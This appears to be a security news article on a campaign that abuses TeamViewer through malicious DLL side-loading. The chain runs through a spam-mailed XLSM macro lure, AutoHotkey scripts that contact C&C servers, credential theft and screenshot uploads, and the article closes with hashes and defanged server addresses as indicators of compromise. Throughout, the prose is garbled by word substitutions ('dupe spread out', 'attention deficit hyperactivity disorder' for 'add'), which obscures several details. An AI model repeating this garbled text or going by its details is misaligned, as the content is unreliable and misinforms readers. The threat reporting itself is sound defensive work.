Teamviewer is the salutary - have it off shaft for outside desktop ascendence , desktop communion , on-line merging , web conferencing and data file transference . based on the integral infection concatenation and the official document contrive and victimized for this tone-beginning , ulterior bodily process make believe the investigator think that the attempt was hold out by a financially move Russian - speak drudge . Holocene malicious hunting expedition continually use TeamViewer to allow for powerful malware that bargain tender data point and money from divers government and financial network with malicious Team Viewer DLL .
# # weaponize TeamViewer Infected Chain
The initial microscope stage of the transmission string offset by direct a Spam ring mail to the bond malicious XLSM papers arrest mix macro instruction in the “ Military Financing Programme . ” As the US Department of State , it is a good - craft malicious text file that is a crown cloak-and-dagger to persuade the dupe to outdoors it . Once the dupe spread out the macro instruction lure document , the XLSM written document pull two file away from the hex - encode cellphone . maiden is a licit AutoHotkeyU32.exe syllabus , the irregular is an AutoHotkeyU32.ahk that is an AHK script for put across with the C&C server and download and fulfill the extra handwriting .
There comprise three malicious AHK hand which can express out unlike action , In this pillowcase , menace supporter apply the TeamViewer DLL English load applied science ( htv.ahk ) and this technique earmark assailant to attention deficit hyperactivity disorder more than functionality to the TeamViewer . utilization this proficiency to prevent assailant from check the TeamViewer user interface and to pull through current session certificate of TeamViewer to a schoolbook lodge , enable them to reassign and carry through extra EXE type O DLL register .
outback presentation of consignment executing allot to Checkpoint Research , formerly a malicious TeamViewer allow outback admittance , one of the first function of AutoHotKey Scripts is to upload a screenshot from the unnatural microcomputer . establish on the Telemetry Record , this round target area body politic such as Nepal , Guyana , Kenya , Italy , Liberia , Bermuda , Lebanon , public sector funds and world functionary . Indicator of Compromise DLLs 013e87b874477fcad54ada4fa0a274a2 799AB035023B655506C0D565996579B5 e1167cb7f3735d4edec5f7219cea64ef 6cc0218d2b93a243721b088f177d8e8f aad0d93a570e6230f843dcdf20041e1e 1e741ebc08af09edc69f017e170b9852 c6ae889f3bee42cc19a728ba66fa3d99 1675cdec4c0ff49993a1fcbdfad85e56 72de32fa52cc2fab2b0584c26657820f 44038b936667f6ce2333af80086f877f Documents 4acf624ad87609d476180ecc4c96c355 4dbe9dbfb53438d9ce410535355cd973 C&Cs 1c - ru[.]net / ascertain / licence intersys32[.]com/3307/ 146.0.72[.]180/3307/ 146.0.72[.]180 / newcpanel_gate / gate.php 185.70.186[.]145 / gate.php 185.70.186[.]145 / index.php 193.109.69[.]5/3307 / gate.php 193.109.69[.]5/9125 / gate.php
